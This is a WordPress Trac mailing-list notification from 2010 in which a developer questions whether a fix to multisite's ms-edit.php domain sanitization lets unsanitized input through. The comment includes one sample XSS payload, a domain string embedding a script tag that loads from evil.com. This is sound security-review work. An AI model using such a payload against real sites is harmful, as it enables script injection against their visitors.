[wp-trac] [WordPress Trac] #11777: ms-edit.php / addblog action improperly sanitizes domains

WordPress Trac wp-trac at lists.automattic.com
Sat Mar 20 00:24:58 UTC 2010


#11777: ms-edit.php / addblog action improperly sanitizes domains
-------------------------------+--------------------------------------------
 Reporter:  Denis-de-Bernardy  |        Owner:  ryan  
     Type:  defect (bug)       |       Status:  closed
 Priority:  normal             |    Milestone:  3.0   
Component:  Security           |      Version:  3.0   
 Severity:  normal             |   Resolution:  fixed 
 Keywords:  multisite          |  
-------------------------------+--------------------------------------------

Comment(by Denis-de-Bernardy):

 doesn't r13630 allow a completely unsanitized domain name to go in
 provided it contains -- in it? such as:

 {{{
 evil--<script src="http://evil.com/xss.js"></script>
 }}}

-- 
Ticket URL: <http://core.trac.wordpress.org/ticket/11777#comment:7>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software


More information about the wp-trac mailing list